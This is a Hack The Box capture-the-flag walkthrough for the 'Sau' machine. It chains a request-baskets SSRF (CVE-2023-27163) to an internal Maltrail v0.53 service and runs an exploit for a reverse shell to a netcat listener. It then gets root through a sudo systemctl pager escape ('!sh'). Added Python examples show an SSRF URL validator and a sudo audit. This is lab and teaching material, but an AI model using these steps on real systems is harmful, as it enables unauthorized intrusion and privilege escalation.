The Be Sure Blog

Sau: Use Server Side Request Forgery to pwn the machine

posted on 10.8.2023 by Below Surface in "Hack The Box"

Portscan:

sudo nmap -sV 10.10.11.224

Reveals:

PORT     STATE   SERVICE VERSION
22/tcp   open    ssh    OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp   filtered http
55555/tcp open    unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94%I=7%D=8/10%Time=64D477DD%P=x86_64-pc-linux-gnu%r(G
(...)

For port 55555 we get a bunch of different responses gathered by Nmap. Some indicate that a website may be running on this port, so we check that in the browser:

10.10.11.224:55555

Yes! A website is displayed. Here we can create buckets to analyze API calls. Let's create a bucket named "buck". Then open it. The URL for the bucket is

http://10.10.11.224:55555/buck

The website allows you to modify this bucket by clicking the settings button. After some research about the service, we find that this version is vulnerable to server-side request forgery (CVE-2023-27163, see sources): the bucket can be configured to forward our requests to an address of our choice, including the machine's own port 80, which is filtered from the outside. This is the path to the reverse shell. Configure the bucket as follows:

Forward URL: http://127.0.0.1:80
Set a check mark for "Proxy Response"
Hit apply

Now, when visiting:

http://10.10.11.224:55555/buck

We get a (broken) Maltrail frontend displayed, which reveals the version 0.53, and an exploit exists for that version!

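As an added example (not part of the original post or of the request-baskets project), here is the kind of check a forwarding service should apply to a user-supplied Forward URL before honouring it: a literal or resolved loopback, private or link-local target such as the 127.0.0.1:80 used above is refused, and an unresolvable host fails closed. The resolver is injectable so the check runs offline; the sample addresses in the usage are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_internal(ip):
    """True for addresses a forwarder must never be pointed at."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def resolve_all(host):
    """Default resolver: every A/AAAA address of host, as strings."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []

def forward_url_is_safe(url, resolver=resolve_all):
    """Return (ok, reason) for a user-supplied Forward URL.

    `resolver` maps a hostname to a list of address strings; it is a
    parameter (assumption of this example) so the check runs without DNS.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname  # already lower-cased by urlsplit
    if not host:
        return False, "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return False, "localhost is not allowed"
    # Literal address: dotted/colon form, or a bare integer such as 2130706433
    try:
        literal = ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        literal = None
    if literal is not None:
        candidates = [literal]
    else:
        candidates = [ipaddress.ip_address(a) for a in resolver(host)]
        if not candidates:
            return False, f"{host} does not resolve"  # fail closed
    # Every address the name maps to must be external, not just the first one
    for ip in candidates:
        if is_internal(ip):
            return False, f"{host} points at internal address {ip}"
    return True, "ok"

if __name__ == "__main__":
    print(forward_url_is_safe("http://127.0.0.1:80/login"))  # constructed input
```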
So we open a new terminal window and start Netcat on port 80:

sudo netcat -lvnp 80

Expected output:

listening on [any] 80 ...

Then we create a new file and paste in the Maltrail-v0.53-Exploit code (resource below):

mkdir temp
cd temp
sudo nano exploitMaltrail.py

Paste the code, hit Ctrl + Shift + O, then Enter, and then Ctrl + Shift + X to close the editor.

Before running the exploit, we change the Forward URL of the bucket to:

Forward URL: http://127.0.0.1:80/login

Now, run the exploit:

python3 exploitMaltrail.py YOURIP 80 http://10.10.11.224:55555/buck

Expected output:

Running exploit on http://10.10.11.224:55555/buck

After a short while, in the Netcat window, the reverse shell opens up! Go and get the user flag:

cd ~
cat user.txt

Time for privilege escalation. Check if the current user puma can run any sudo commands:

sudo -l

Relevant output:

User puma may run the following commands on sau:
   (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

So, let's run this command:

sudo /usr/bin/systemctl status trail.service

The status output is shown in a pager, from which we can escape to a shell. Type in

!sh

Hit enter

cd ~
cat root.txt
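As an added example (not part of the original post), an audit that reads `sudo -l` output and flags entries like the one above: a `systemctl status` run under sudo hands the terminal to a pager, and pagers and editors allow a shell escape. The sample output is constructed around the trail.service entry from this box; the other entries are made up.

```python
import re
import shlex

# Constructed sample of `sudo -l` output: the trail.service entry is the one
# from this box, the remaining entries are made up to exercise the audit.
SAMPLE_SUDO_L = """\
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    (root) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
    (root) /usr/bin/less /var/log/syslog
    (root) /usr/bin/apt-get update
"""

# Programs that hand the terminal to an interactive pager or editor, from which
# a shell escape such as !sh runs with the granted privileges.
INTERACTIVE = {"less", "more", "most", "vi", "vim", "nano", "man"}
# systemctl subcommands whose output goes through a pager unless --no-pager is given
PAGED_SYSTEMCTL = ("status", "cat", "list-")

# "(runas) TAG: TAG: command args" as printed by sudo -l
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:\w+:\s*)*(?P<cmd>\S.*)$")

def audit_sudo_l(text):
    """Return (command, reason) for each entry that can escape to a shell."""
    findings = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # header line, not an entry
        cmd = m.group("cmd").strip()
        argv = shlex.split(cmd)
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "systemctl":
            sub = next((a for a in argv[1:] if not a.startswith("-")), "")
            if sub.startswith(PAGED_SYSTEMCTL) and "--no-pager" not in argv:
                findings.append((cmd, "output is piped through a pager; add --no-pager"))
        elif prog in INTERACTIVE:
            findings.append((cmd, f"{prog} is interactive and allows a shell escape"))
    return findings

if __name__ == "__main__":
    for cmd, why in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{cmd}\n    -> {why}")
```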

Done!

Tags:

hack the box
server side request forgery
ssrf
known vulnerabilities
maltrail
request baskets

Sources:

https://app.hackthebox.com/machines/Sau
https://notes.sjtu.edu.cn/s/MUUhEymt7#
https://github.com/entr0pie/CVE-2023-27163
https://github.com/spookier/Maltrail-v0.53-Exploit/tree/main
https://mirror.xyz/zerodaily.eth/CxIO5X6zpK42DguO5UJ60rJNpzWpIo-40PSImW39rno
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/
